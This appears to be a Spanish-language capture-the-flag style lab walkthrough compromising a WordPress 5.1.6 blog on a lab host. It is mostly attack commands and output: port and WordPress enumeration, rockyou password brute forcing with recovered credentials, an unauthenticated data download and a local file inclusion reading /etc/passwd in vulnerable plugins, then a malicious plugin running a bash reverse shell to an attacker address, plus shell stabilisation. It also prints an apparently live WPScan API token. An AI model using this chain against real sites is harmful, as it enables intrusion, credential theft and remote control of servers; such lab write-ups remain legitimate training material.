💡 Nota: Ten en cuenta la resolución DNS local en Linux cuando no hay servidor DNS. Esto requiere editar /etc/hosts 🖥️✍️

🧭 Enumeración

1️⃣ Escaneo de puertos

sudo nmap -p- --min-rate 5000 --open -sS -n -sVC 10.129.174.9

2️⃣ Revisión de enlaces en la página

curl -s http://10.129.174.9/ | grep -oP 'href="https?://[^"]*"' | head

🔹 Resultado: hay un enlace hacia http://blog.inlanefreight.local
3️⃣ Resolución DNS local

echo "<IP> blog.inlanefreight.local" | sudo tee -a /etc/hosts

🔹 Ahora podemos acceder a WordPress correctamente.
🔹 Confirmación con Wappalyzer: WordPress versión 5.1.6 ✅

📦 Enumeración WordPress

wpscan --url http://blog.inlanefreight.local/ --enumerate --api-token '5ugIrGct21UCN2EjsCgtRssmcLHJm33GGe3P0yU7Vko'  > results_wpscan.txt 

🔹 Resultados del Escaneo

• Tema activo: twentynineteen v1.3
  

• Plugins encontrados:

  • 📧 Email Subscribers v5.9.5

  • 🧩 Site Editor v1.1.1

  • 📅 The Events Calendar v6.15.7

• Usuarios enumerados:

  • 👩‍💼 Erika

  • 👨‍💼 admin

  • 👨‍💻 Charlie Wiggins

🔍 Acceso a directorio público:
http://blog.inlanefreight.local/wp-content/uploads/

🧨 Explotación

1️⃣ Fuerza bruta de contraseñas

Ya tenemos tres usuarios: admin, Erika, Charlie Wiggins.
Podemos intentar un ataque de fuerza bruta usando rockyou.txt:

wpscan --url http://blog.inlanefreight.local/ --usernames admin,erika,charlie,charliewiggins,cwiggins --passwords /usr/share/wordlists/rockyou.txt

🔹 WPScan intentará autenticar a cada usuario con cada contraseña de la lista.

✅ Credenciales descubiertas:

• erika : 010203

• charlie : soccer13
  

2️⃣ Explotación del Plugin Email Subscribers

El plugin vulnerable permite la descarga de reportes sin autenticación:

curl -s "http://blog.inlanefreight.local/wp-admin/admin.php?page=download_report&report=users&status=all"

📄 Resultado: descarga de información sensible de usuarios.

3️⃣ Explotación del Plugin Site Editor

📚 Referencia: Exploit-DB #44340

El parámetro ajax_path permite Local File Inclusion (LFI):

curl -s http://blog.inlanefreight.local//wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

📂 Salida del LFI:
Se observan usuarios del sistema:
frank.mclane, erika, mrb3n

💻 Acceso al Sistema

Con las credenciales válidas (erika:010203), iniciamos sesión en:
👉 http://blog.inlanefreight.local/wp-login.php

🔁 Reverse Shell mediante Plugin

Si el usuario puede subir plugins, creamos un plugin malicioso con una reverse shell:

📄 Archivo: reverse.php

<?php
/* 
Plugin Name: WPReverseShell 
Plugin URI: https://malicious.example.com 
Description: Educational reverse shell plugin for testing. 
Version: 1.0 
Author: RedTeam 
Author URI: https://malicious.example.com 
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP_atacante>/9001 0>&1'");
?>

📦 Lo comprimimos:

zip reverse.zip reverse.php

🎧 Preparamos el listener:

nc -lvnp 9001

📤 Subimos e instalamos desde:

Plugins → Add New → Upload Plugin → reverse.zip → Install & Activate

✅ Al activarlo, se abre la conexión reverse shell:

⚙️ Mejora de la Shell

Para una sesión más estable y funcional:

script /dev/null -c bash
# Suspender la shell actual:
ctrl+z
# Restauramos la conexión:
stty raw -echo; fg
# Reiniciamos la terminal y configuramos la compatibilidad con xterm:
reset xterm
export TERM=xterm
export SHELL=bash

Si intentamos usar editores como nano, vi o cat, la terminal puede mostrar limitaciones en el tamaño de la pantalla. Para solucionar esto, ajustamos el tamaño de la terminal con los siguientes comandos:

# Abrimos una nueva terminal en el host o máquina atacante y ejecutamos:
stty size
# Ajustamos las filas y columnas de la terminal para que se vean correctamente:
stty rows 52 columns 115

[!success] ✅ Resultado

• Se descubrió un sitio WordPress oculto por DNS.

• Se explotaron vulnerabilidades en plugins y contraseñas débiles.

• Se obtuvo acceso remoto al servidor web con una reverse shell interactiva.

• Listo para continuar con la escalada de privilegios. 🔐